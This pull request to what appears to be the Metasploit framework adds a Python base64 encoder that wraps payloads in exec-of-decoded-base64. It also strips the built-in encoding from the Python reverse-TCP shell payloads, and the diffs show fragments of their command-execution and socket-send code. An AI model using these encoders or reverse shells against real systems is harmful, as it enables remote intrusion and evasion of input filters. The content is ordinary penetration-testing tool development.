### PR TITLE
Python b64 encoder

### DIFF
--- a/modules/encoders/python/base64.rb
+++ b/modules/encoders/python/base64.rb
@@ -1,0 +1,57 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Encoder
+  Rank = ExcellentRanking
+
+  def initialize
+    super(
+      'Name'             => 'Python Base64 Encoder',
+      'Description'      => %q{
+        This encodes the command as a base64 encoded command for python.
+      },
+      'Author'           => 'Ben Campbell',
+      'Arch'             => ARCH_PYTHON,
+      'Platform'         => 'python')
+  end
+
+
+  #
+  # Encodes the payload
+  #
+  def encode_block(state, buf)
+    # Skip encoding for empty badchars
+    if state.badchars.length == 0
+      return buf
+    elsif state.badchars.include?("'") && state.badchars.include?('"')
+      raise EncodingError, "Cannot base64 with both single quote and double quote badchars."
+    end
+
+    base64 = encode_buf(buf)
+
+    if state.badchars.include? '='
+        while base64.include? '='
+          buf << " "
+          base64 = encode_buf(buf)
+        end
+    end
+
+    if state.badchars.include? "'"
+      encoded = "exec(\"#{base64}\".decode(\"base64\"))"
+    else
+      encoded = "exec('#{base64}'.decode('base64')"
+    end
+
+    encoded
+  end
+
+  def encode_buf(buf)
+    Rex::Text.encode_base64(buf)
+  end
+
+end
+

--- a/modules/encoders/python/base64.rb
+++ b/modules/encoders/python/base64.rb
@@ -41,13 +41,13 @@ class Metasploit3 < Msf::Encoder
     end
 
     if state.badchars.include? "'"
-      if state.badchars =~ /[; \{\},\[\]]/
+      if state.badchars =~ /[:; \{\},\[\]]/
         encoded = "exec(\"#{base64}\".decode(\"base64\"))"
       else
         encoded = "import sys;exec({2:str,3:lambda b:bytes(b,\"UTF-8\")}[sys.version_info[0]](\"#{base64}\").decode(\"base64\"))"
       end
     else
-      if state.badchars =~ /[; \{\},\[\]-_]/
+      if state.badchars =~ /[:; \{\},\[\]]/
         encoded = "exec('#{base64}'.decode('base64'))"
       else
         encoded = "import sys;exec({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('#{base64}').decode('base64'))"

--- a/modules/encoders/python/base64.rb
+++ b/modules/encoders/python/base64.rb
@@ -41,9 +41,17 @@ class Metasploit3 < Msf::Encoder
     end
 
     if state.badchars.include? "'"
-      encoded = "exec(\"#{base64}\".decode(\"base64\"))"
+      if state.badchars =~ /[; \{\},\[\]]/
+        encoded = "exec(\"#{base64}\".decode(\"base64\"))"
+      else
+        encoded = "import sys;exec({2:str,3:lambda b:bytes(b,\"UTF-8\")}[sys.version_info[0]](\"#{base64}\").decode(\"base64\"))"
+      end
     else
-      encoded = "exec('#{base64}'.decode('base64')"
+      if state.badchars =~ /[; \{\},\[\]-_]/
+        encoded = "exec('#{base64}'.decode('base64'))"
+      else
+        encoded = "import sys;exec({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('#{base64}').decode('base64'))"
+      end
     end
 
     encoded

--- a/modules/payloads/singles/python/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/python/shell_reverse_tcp.rb
@@ -58,9 +58,6 @@ module Metasploit3
     cmd << "\tstdout_value=stdout.read()+stderr.read()\n"
     cmd << "\tso.send(stdout_value)\n"
 
-    # Base64 encoding is required in order to handle Python's formatting requirements in the while loop
-    cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))"
-
     cmd
   end
 

--- a/modules/payloads/singles/python/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/python/shell_reverse_tcp.rb
@@ -16,7 +16,7 @@ module Metasploit3
   def initialize(info = {})
     super(merge_info(info,
       'Name'          => 'Command Shell, Reverse TCP (via python)',
-      'Description'   => 'Creates an interactive shell via python, encodes with base64 by design. Compat with 2.3.3',
+      'Description'   => 'Creates an interactive shell via python. Compat with 2.3.3',
       'Author'        => 'Ben Campbell', # Based on RageLtMan's reverse_ssl
       'License'       => MSF_LICENSE,
       'Platform'      => 'python',

--- a/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
+++ b/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
@@ -16,7 +16,7 @@ module Metasploit3
   def initialize(info = {})
     super(merge_info(info,
       'Name'          => 'Command Shell, Reverse TCP SSL (via python)',
-      'Description'   => 'Creates an interactive shell via python, uses SSL, encodes with base64 by design.',
+      'Description'   => 'Creates an interactive shell via python, uses SSL.',
       'Author'        => 'RageLtMan',
       'License'       => BSD_LICENSE,
       'Platform'      => 'python',
@@ -58,9 +58,6 @@ module Metasploit3
     cmd += "\tproc=subprocess.Popen(data,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n"
     cmd += "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n"
     cmd += "\ts.send(stdout_value)\n"
-
-    # Base64 encoding is required in order to handle Python's formatting requirements in the while loop
-    cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))"
 
     cmd
   end


### PR DESCRIPTION
Currently all the ARCH_PYTHON payloads are base64 encoding themselves. Ideally we implement an encoder that handles this kind of thing. 

Poke @zeroSteiner The bind_tcp and reverse_tcp stagers currently do some advanced stuff that I'm not sure is required or not?

You can execute \t statements in an exec statement e.g. `exec("if True:\n\tprint 1")` the \t is probably only a badchar for the commandline?
## Verification
- [ ] python/meterpreter/reverse_tcp and bind_tcp still work
- [ ] python/shell_reverse_tcp and shell_reverse_tcp_ssl still work
- [ ] Check for modules with ARCH_PYTHON and sort out badchars...
